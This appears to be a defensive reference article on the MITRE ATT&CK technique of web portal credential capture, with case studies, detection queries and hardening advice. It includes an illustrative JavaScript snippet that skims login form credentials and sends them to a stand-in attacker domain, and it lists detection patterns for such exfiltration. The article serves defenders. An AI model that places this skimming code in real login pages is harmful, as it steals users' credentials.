T1056.003: Web Portal Capture

Web Portal Capture sits at the intersection of initial access and persistence. An adversary who has already compromised a VPN appliance or web server can modify its login page to harvest every credential that passes through it — turning a network perimeter device into a persistent credential collection platform. Because the underlying authentication still completes successfully, users have no indication anything is wrong, and the harvested credentials can be used immediately or stockpiled for later lateral movement.

The technique maps to two MITRE ATT&CK tactics simultaneously: Credential Access (TA0006) and Collection (TA0009). This dual mapping reflects the technique's dual purpose — it steals credentials while also serving as an ongoing data collection mechanism that persists as long as the portal modification remains in place. Documented real-world incidents show threat actors maintaining modified login pages for weeks or months, collecting credentials from entire user populations without raising alerts.

How Web Portal Capture Works

The attack sequence begins before T1056.003 itself — an adversary must first gain sufficient access to the web server or network appliance hosting the login portal. This initial foothold is commonly obtained through exploitation of a vulnerability in the portal software itself, through use of already-compromised administrative credentials, or through exploitation of a separate system with access to the portal's file system. Once administrative or file system access to the portal exists, the technique proceeds in predictable phases.

Phase 1: Portal Modification

The adversary locates the login page source files and injects malicious code. On Cisco ASA WebVPN appliances this typically means modifying webvpn_login.html or related JavaScript. On Microsoft Exchange OWA deployments, the target is often logon.aspx or associated client-side scripts served by IIS. On Ivanti Connect Secure (formerly Pulse Secure), JavaScript files loaded during the login sequence are modified. The injection is typically a small block of JavaScript that registers an event listener on the login form's submit event:

// Example of the style of injection used in portal capture attacks
// Attacker adds this to the login page's JavaScript
document.getElementById('loginForm').addEventListener('submit', function() {
    var u = document.getElementById('username').value;
    var p = document.getElementById('password').value;
    var img = new Image();
    img.src = 'https://attacker-controlled-domain.com/collect?u='
              + encodeURIComponent(u) + '&p=' + encodeURIComponent(p);
});

The code above illustrates the general pattern. The actual implementations used by threat actors such as WARPWIRE are more sophisticated, using obfuscation and encoded transmissions to reduce detectability, but the underlying mechanism is consistent: capture form field values on submission and transmit them to external infrastructure.

Phase 2: Credential Interception and Exfiltration

When a legitimate user submits their credentials through the compromised portal, the injected code fires before or during the authentication POST request. The captured username and password values are transmitted — typically via an asynchronous HTTP request or a pixel-tracking technique using an image object — to an attacker-controlled server. The authentication request still reaches its intended destination, so the user logs in normally and has no indication the capture occurred.

In server-side variants of this technique, the malicious code is embedded in the portal's backend rather than in client-side JavaScript. IceApple, a post-exploitation framework targeting IIS-based environments, includes an OWA credential logger module that monitors authentication requests at the server level and records submitted credentials without modifying the client-facing login page at all. This approach is harder to detect through client-side file integrity monitoring alone.

MFA Bypass Potential

Real-World Case Studies

Cutting Edge: Ivanti Connect Secure Zero-Day Exploitation (2023–2024)

In one of the most significant documented uses of T1056.003, threat actors exploited two zero-day vulnerabilities in Ivanti Connect Secure VPN — CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) — to achieve unauthenticated remote code execution on affected appliances. Volexity first identified active exploitation in early December 2023, with public reporting published in January 2024. Following RCE, the attackers modified a legitimate JavaScript file associated with the web SSL VPN login process. The altered script intercepted credentials entered by users and transmitted them to attacker-controlled infrastructure. CISA subsequently responded to multiple incidents involving these vulnerabilities, noting that in some cases the compromise resulted in full domain compromise. The WARPWIRE credential harvester, deployed as part of this campaign, was purpose-built for this style of portal-level credential capture and could harvest credentials submitted during the web login process to access layer-seven applications including RDP.

Cisco WebVPN Virtual Private Keylogging (2015)

Volexity's 2015 research into what they termed "virtual private keylogging" documented adversaries compromising Cisco ASA WebVPN login pages to harvest user credentials. The attackers modified the webvpn_login.html portal file on compromised Cisco devices to inject JavaScript that captured submitted credentials before forwarding the login to the VPN appliance. The modified portals transmitted the harvested credentials to external servers, giving the adversary persistent access to new credentials with each user login. This remains one of the foundational documented examples of T1056.003 and is cited in the official MITRE ATT&CK entry for the technique.

IceApple OWA Credential Logging

CrowdStrike documented IceApple, a post-exploitation framework targeting IIS-based web applications, in May 2022. One of IceApple's modules specifically monitors OWA authentication requests and logs submitted credentials at the server level, without modifying client-facing files. This server-side approach means client-side file integrity monitoring of OWA JavaScript would not detect the compromise — the modification is to IIS-registered modules rather than served HTML or JS files. The IceApple framework was assessed by CrowdStrike as the work of a nation-state adversary, given the sophistication of its anti-forensic capabilities and the targeting profile of observed incidents.

TEMP.Veles and the Triton Attack

During the Triton safety instrumented system attack targeting a Middle Eastern petrochemical facility, TEMP.Veles — the threat group behind the TRITON/TRISIS malware — used a web portal capture approach to collect credentials as users changed their passwords on a compromised system. Login codes submitted through a web interface were redirected to sites under the attackers' control. This case illustrates T1056.003 being used in an industrial control system context, where credential access to operational technology networks carries potentially catastrophic consequences beyond the typical data theft or ransomware scenarios seen in IT environments.

Winter Vivern Government Portal Spoofing

Winter Vivern, a threat group with ties to Belarusian and Russian intelligence interests, was documented by SentinelOne registering and hosting domains that mirrored the appearance of legitimate government email login portals across European countries. Targets included email infrastructure used by government officials and defense organizations. Rather than modifying a legitimate portal, Winter Vivern created convincing replicas that captured submitted credentials before optionally forwarding users to the real service. This variant blends T1056.003 with phishing infrastructure but achieves the same outcome — credential capture through a web-based login interface that users believe to be genuine.

Detection Strategies

Detection for T1056.003 is strongest when multiple monitoring layers are combined. No single control catches all variants — server-side modifications evade client-side file monitoring, and obfuscated JavaScript can evade simple keyword-based content inspection. Layering file integrity monitoring, network egress analysis, and periodic manual review of portal code provides the best coverage.

File Integrity Monitoring — Login Portal Files

# Linux / auditd: monitor writes to known portal file paths
-w /opt/pulsesecure/web/login/ -p wa -k portal_modify
-w /var/www/html/vpn/ -p wa -k portal_modify

# Windows / Sysmon Event ID 11: file creation in IIS web roots
# Look for writes to OWA paths outside of expected update windows
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=11
TargetFilename IN (
  "*\\OWA\\auth\\*",
  "*\\OWA\\*\\logon.aspx",
  "*\\WebVPN\\*"
)
| stats count by Computer, TargetFilename, Image, User

Network Egress — Outbound Connections from Portal Hosts

# Splunk: alert on outbound connections from VPN/portal servers
# to destinations not in the approved outbound allow-list
index=network sourcetype=firewall
src_ip IN (vpn_appliance_ips)
dest_ip!=internal_network
action=allowed
| stats count by src_ip, dest_ip, dest_port
| where count > 5
| sort - count

Behavioral Indicators

Indicator	What It Means
Unexpected modification timestamp on login page HTML or JavaScript files	File integrity violation; login portal files should only change during sanctioned update windows
New outbound HTTP/HTTPS connections from a VPN or OWA host to external IPs	Possible credential exfiltration channel; portal servers have no business reason to initiate external connections
JavaScript containing XMLHttpRequest, fetch(), or new Image() calls to non-organizational domains in login page source	Classic credential exfiltration pattern; these calls should never appear in a legitimate authentication flow
Unexpected IIS module or HTTP handler registration on OWA or SharePoint server	Server-side credential capture; IceApple-style modules register as IIS components to log authentication traffic
Base64-encoded strings or obfuscated JavaScript blocks appearing in portal page source after a change event	Injected credential harvesting code typically obfuscates endpoint URLs and payload formatting

Known Threat Actors Using T1056.003

Web Portal Capture is primarily associated with nation-state and advanced persistent threat actors because the technique requires prior access to the targeted portal infrastructure and tends to be deployed as part of longer-term operations rather than opportunistic attacks.

• Cutting Edge campaign actors (suspected China-nexus) — Deployed WARPWIRE credential harvester against Ivanti Connect Secure VPN appliances following zero-day exploitation in late 2023 and early 2024, affecting organizations across government, defense, and critical infrastructure sectors.
• TEMP.Veles (Russia, GRU-linked) — Used web portal credential capture as part of the broader Triton/TRISIS ICS attack campaign, redirecting credentials submitted through a web interface to attacker-controlled infrastructure.
• IceApple operators (suspected nation-state) — Deployed IceApple's OWA credential logger module against IIS-based email and collaboration portals, capturing authentication credentials at the server level without modifying client-facing files.
• Winter Vivern (Belarus/Russia-aligned) — Created spoofed login portals mirroring government email services used by European government officials and defense personnel, capturing credentials submitted to the fake portals.
• Leviathan / APT40 (China) — Observed capturing MFA codes in real time from compromised remote access portals during the Leviathan Australian Intrusions campaign, demonstrating T1056.003 being used to defeat two-factor authentication.

Defensive Recommendations

1. Implement file integrity monitoring on all portal-facing web server paths: Configure FIM tools to alert on any change to HTML, JavaScript, ASPX, PHP, and configuration files within the web roots of VPN appliances, OWA servers, SSO portals, and any other externally facing authentication services. Changes should require a change ticket correlation to be considered authorized — unanticipated file modifications are high-confidence indicators of compromise.
2. Apply strict egress filtering on portal host systems: VPN appliances, OWA servers, and authentication portals have no legitimate business reason to initiate outbound connections to the internet. Enforce egress rules at the firewall and host level that block all outbound connections from these systems except to defined update servers, logging infrastructure, and authentication back-ends. Alert on any outbound connection that falls outside these approved destinations.
3. Separate administrative access from portal operation: Never use the same accounts for day-to-day operations and portal administration. Privileged accounts with the ability to modify portal files or IIS module registrations should be used exclusively for that purpose, stored in a PAM solution, and require MFA with phishing-resistant authenticators. Restricting who can modify portal code reduces the attack surface significantly.
4. Audit IIS module registrations and HTTP handlers regularly: On Windows-based portals running OWA or SharePoint, periodically review registered IIS modules and HTTP handlers for unexpected entries. IceApple-style server-side credential loggers register as IIS components that survive portal file restores — they will not be caught by JavaScript-level inspection. SIEM alerting on changes to IIS configuration (Event ID 4657 for IIS configuration changes) provides coverage.
5. Use hardware-bound or phishing-resistant MFA: While T1056.003 can capture TOTP codes in a real-time relay scenario, hardware security keys (FIDO2/WebAuthn) bind authentication to the origin domain. A user authenticating to a spoofed portal or a real portal with injected code that attempts to relay to a different origin will have the authentication fail because the key's signature is domain-specific. Deploying FIDO2 keys eliminates the MFA bypass risk inherent in portal capture attacks.
6. Conduct periodic manual source review of externally facing login pages: Automated FIM catches file modification timestamps, but obfuscated injection in cached or dynamically generated content may not always trigger standard FIM alerts. Periodically download and manually review the source of externally serving login pages from an external vantage point — what an attacker's injection would serve to users — and compare against known-good baseline captures.
7. Apply prompt patching to VPN appliances and web portal software: A significant portion of documented T1056.003 incidents begin with exploitation of a known or zero-day vulnerability in the portal software itself. Maintaining aggressive patch cadences for Ivanti, Cisco, Citrix, and similar appliances eliminates the initial access vector that enables portal modification. Where vendor patches are delayed, consider temporary mitigations such as access restriction or taking the portal offline until the patch is available.

MITRE ATT&CK Mapping

Field	Value
Technique ID	T1056.003
Technique Name	Input Capture: Web Portal Capture
Parent Technique	T1056 — Input Capture
Tactics	Credential Access (TA0006), Collection (TA0009)
Platforms	Linux, Windows, macOS
Data Sources	File: File Modification; Network Traffic: Network Connection Creation; Application Log: Application Log Content
Mitigations	M1026 Privileged Account Management
ATT&CK Version	v18 (Last Modified: 24 October 2025)
MITRE Reference	attack.mitre.org/techniques/T1056/003

Frequently Asked Questions

What is T1056.003 Web Portal Capture?

T1056.003 Web Portal Capture is a MITRE ATT&CK sub-technique under Input Capture (T1056) in which adversaries inject credential-harvesting code into externally facing login portals such as VPN appliances, OWA, and SSO interfaces. The injected code intercepts usernames and passwords entered by legitimate users and transmits them to attacker-controlled infrastructure, often transparently so the user's authentication still succeeds.

How do adversaries carry out Web Portal Capture?

Adversaries first gain access to the web server or appliance hosting the login portal — either through initial exploitation of a vulnerability or by using previously compromised administrative credentials. They then modify the login page's HTML, JavaScript, or server-side code to capture form field values before the authentication request is forwarded. The captured credentials are stored locally or transmitted to a remote server under their control.

How can organizations detect Web Portal Capture?

Detection focuses on monitoring web server file integrity for unauthorized modifications to login-facing files, alerting on unexpected outbound connections from portal hosts, and reviewing IIS module registrations or JavaScript loaded by authentication pages. File integrity monitoring tools and SIEM alerting on changes to known portal file paths are effective first-line controls.

Sources and References

• MITRE ATT&CK — T1056.003 Input Capture: Web Portal Capture: attack.mitre.org
• Volexity — Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence: volexity.com
• Volexity — Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN: volexity.com
• Mandiant — Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation: mandiant.com
• CrowdStrike — ICEAPPLE: A Novel Internet Information Services Post-Exploitation Framework: crowdstrike.com
• CISA — Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (AA24-060B): cisa.gov
• SentinelOne — Winter Vivern: Uncovering a Wave of Global Espionage: sentinelone.com